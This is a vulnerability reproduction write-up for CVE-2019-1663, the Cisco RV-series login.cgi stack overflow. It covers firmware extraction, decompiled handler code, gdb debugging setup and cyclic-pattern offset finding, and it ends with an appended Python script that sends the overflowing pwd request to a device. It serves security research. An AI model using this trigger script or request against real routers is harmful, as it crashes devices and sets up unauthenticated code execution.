(CVE-2019-1663) Cisco Stack Buffer Overflow Vulnerability.docx
(CVE-2019-1663) Stack Buffer Overflow Vulnerability

I. Vulnerability summary

CVE-2019-1663 is a stack buffer overflow affecting several low-end Cisco devices. The web management interface does not strictly validate the pwd field of the login form; when the underlying handler processes the request it copies the field with strcpy, which overflows a stack buffer. An unauthenticated remote attacker can use this to execute arbitrary code on the device.

II. Affected versions

Cisco RV110W < 1.2.1.7
Cisco RV130/RV130W < 1.0.3.45
Cisco RV215W < 1.3.0.8

III. Reproduction

0x01 Firmware extraction

The tests here were done on Cisco RV130W firmware 1.0.3.44. Extracting the image with binwalk shows that the file system is squashfs, stored little-endian, and yields a Linux-like directory tree:

(directory listing of squashfs-root, garbled in extraction: the usual bin, dev, etc, lib, mnt, proc, sbin, tmp, usr and var directories)

0x02 Locating the request handler

Use grep -r "http" to find the binaries that handle HTTP requests:

(grep output, garbled in extraction: a long list of "Binary file ... matches" lines for programs and shared libraries under usr/sbin, usr/bin and usr/lib, among them usr/sbin/httpd and the libssl/libcrypto objects)

Based on experience with several other embedded devices, the guess is that usr/sbin/httpd is the program that handles HTTP requests at the lowest level.

0x03 Vulnerability analysis

Send the following POST request to login.cgi of the web login page:

POST /login.cgi HTTP/1.1
Host: 10.10.10.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.2/
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Connection: close
Upgrade-Insecure-Requests: 1

submit_button=login&submit_type=&gui_action=&wait_time=0&change_action=&enc=1&user=cisco&pwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sel_lang=EN

Here pwd is sent as a 32-byte value (Content-Length 137 matches this body exactly). In IDA the function that handles the login request is sub_2C614, at address 0x0002C614. Its decompiler output, cleaned up from the garbled extraction, is:

    v13 = atoi(v12);
    sprintf(v67, "%d", v13 + 1);
    nvram_set("default_login", &byte_899D8);
    v14 = sub_1D170((int)"user");
    if ( !v14 )
      v15 = "";
    v36 = (char *)v14;
    if ( !v14 )
      v36 = v15;
    v16 = sub_1D170((int)"pwd");
    v37 = (char *)v16;
    if ( !v16 )
      v17 = "";
    if ( !v16 )
      v37 = v17;
    nptr = (char *)sub_1D170((int)"enc");
    if ( !nptr )
      nptr = (char *)&word_89A4C;
    if ( !post )
      sub_1CFB4(35);
    v25 = sub_1D170((int)"user");
    if ( !v25 )
      v26 = "";
    v36 = (char *)v25;
    if ( !v25 )
      v36 = v26;
    v27 = sub_1D170((int)"pwd");
    v37 = (char *)v27;
    if ( !v27 )
      v28 = "";
    if ( !v27 )
      v37 = v28;
    nptr = (char *)sub_1D170((int)"enc");
    if ( !nptr )
      nptr = (char *)&word_89A4C;

sub_1D170 looks up a POST parameter by name; note that none of these lookups checks the length of the value it returns. The function parses the POST parameters and stores them in the .bss segment:

(IDA listing of the .bss region, garbled in extraction: the parsed parameters are laid out as consecutive NUL-terminated strings, "enc", "user", "cisco", "pwd", the 32-byte "AAAA..." password, "sel_lang" and "EN", at addresses around 0x000A8C18 to 0x000A8C60)

The pwd value is then fetched from .bss and strcpy is called to copy it into dynamically allocated memory, with no bound on the length of the source string:

(disassembly of httpd around 0x0002C258 to 0x0002C278, garbled in extraction: the block loads the stored pwd value, compares it and branches to loc_2C264/loc_2C278, then performs the copy; the CODE XREF comment is only partly legible but appears to reference a check_enc_passwd routine)
strcpy is familiar to everyone, and the security problem it brings is well known: it copies until the first NUL byte, so a long pwd simply runs past the end of the destination buffer. Because httpd is not built as PIE and the device does not randomise address space, code and stack addresses are the same on every run, so the overflow can be exploited without any information leak (this can be confirmed by checking the ELF type of httpd, which is EXEC rather than DYN for a non-PIE binary, and the kernel's randomize_va_space setting on the device).

Next, gdb is used for remote debugging to determine how many bytes are needed before the overflow is triggered. First set up the Cisco side as the gdb debug server. gdbserver configuration:

# wget http://10.10.10.1:8000/gdbserver
  (download gdbserver from the host machine into the QEMU-emulated Cisco environment)
# chmod 777 ./gdbserver
  (make it executable)
# ps -w | grep httpd
  (find the PID of the running httpd)
 2451     0   5472 S    /usr/sbin/httpd
 2454     0   1196 S    grep httpd
# ./gdbserver :1234 --attach 2451
  (1234 is the listening port; --attach takes the PID of httpd)
Attached; pid = 2451
Listening on port 1234

gdbserver is now listening successfully.

Build arm-linux-gdb:

tar xvf gdb-7.8.1.tar.gz
cd gdb-7.8.1
mkdir arm-gdb
sudo chmod 777 arm-gdb
sudo apt-get install texinfo
./configure --target=arm-linux --prefix=/home/clb/tools/gdb-7.8.1/arm-gdb
make && make install

Afterwards the bin directory under arm-gdb contains arm-linux-gdb, which is used for the debugging session. Configure the debugging options:

./arm-linux-gdb
gef> set architecture arm
  (the target being debugged is ARM)
gef> set follow-fork-mode child
  (follow the child process after a fork, so that the process actually servicing the request is debugged)
gef> set solib-search-path /home/clb/liot/firmware/cisco/_RV130.bin.extracted/squashfs-root/lib
  (where to find the shared libraries the binary uses)
gef> file /home/clb/liot/firmware/cisco/_RV130.bin.extracted/squashfs-root/usr/sbin/httpd
  (load the binary being debugged)
gef> target remote 10.10.10.2:1234
  (connect to the remote gdbserver)

The debugging connection is now established and debugging can begin. To locate the overflow position, use pattern to generate a 512-byte string:

gef> pattern create 512
[+] Generating a pattern of 512 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaab
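As an added example, not part of the original write-up, the following Python script ties the login request from the vulnerability analysis section to the pattern step above: it generates the same cyclic pattern that gef's pattern create prints, builds the login.cgi POST with pwd set to any payload (recomputing Content-Length, which is 137 for the 32 x "A" pwd shown earlier), and, once httpd has crashed under gdbserver, maps a register value read from gef back to an offset in the pattern, which is what gef's pattern offset does and goes one step past what the page shows. TARGET_HOST, TARGET_PORT, the use of plain HTTP and the send_login helper are assumptions; the page only shows the request text with Host: 10.10.10.2.

```python
#!/usr/bin/env python3
"""Trigger helper for the CVE-2019-1663 login.cgi overflow (added example).

Assumptions, not taken from the original write-up: the device answers plain
HTTP on TARGET_HOST:TARGET_PORT. Nothing is sent unless send_login() is called.
"""
import itertools
import socket
import struct

TARGET_HOST = "10.10.10.2"   # assumption: the Host header used in the write-up
TARGET_PORT = 80             # assumption: plain HTTP, not TLS

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Lazily yield the de Bruijn sequence B(k, n): every n-char window is unique.

    This is the construction behind gef's "pattern create"; with the lowercase
    alphabet and n=4 it starts aaaabaaacaaadaaa..., matching the write-up.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    yield alphabet[c]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length):
    """First `length` characters of the cyclic pattern (all URL-safe letters)."""
    return "".join(itertools.islice(de_bruijn(), length))


def pattern_offset(value, length=512):
    """Offset of a crashed register's contents inside pattern_create(length).

    `value` is the 4-char substring seen in a register or the register's integer
    value as gdb prints it. The firmware is little-endian ARM, so an integer
    is unpacked with "<I" first. Returns -1 when the value is not from the pattern.
    """
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii", "replace")
    return pattern_create(length).find(value)


def build_login_request(pwd, host=TARGET_HOST):
    """Raw login.cgi POST from the write-up with `pwd` substituted and
    Content-Length recomputed from the body."""
    body = ("submit_button=login&submit_type=&gui_action=&wait_time=0"
            "&change_action=&enc=1&user=cisco&pwd=" + pwd + "&sel_lang=EN")
    headers = [
        "POST /login.cgi HTTP/1.1",
        "Host: " + host,
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(body)),
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("ascii")


def content_length(request):
    """Parse Content-Length back out of a request built above (for checking)."""
    head = request.split(b"\r\n\r\n", 1)[0].decode("ascii")
    for line in head.split("\r\n"):
        if line.lower().startswith("content-length:"):
            return int(line.split(":", 1)[1])
    return None


def send_login(pwd, host=TARGET_HOST, port=TARGET_PORT, timeout=5):
    """Send one login POST; returns httpd's reply, or b"" if the child died."""
    req = build_login_request(pwd, host)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except (socket.timeout, ConnectionResetError):
            pass   # a crashed httpd child closes the socket without answering
    return b"".join(chunks)


if __name__ == "__main__":
    # 1. With httpd attached to gdbserver, send the 512-byte pattern as pwd.
    # 2. Read pc/lr from gef after the SIGSEGV and map it back to an offset.
    print(send_login(pattern_create(512)))
    print(pattern_offset(0x6161616d))   # "maaa" sits at offset 48
```

Because the pattern is pure lowercase letters it needs no URL encoding in the form body; a later payload containing NUL or non-ASCII bytes would, and a NUL would also terminate the strcpy early, which is the constraint that matters when the offset found here is turned into a return-address overwrite.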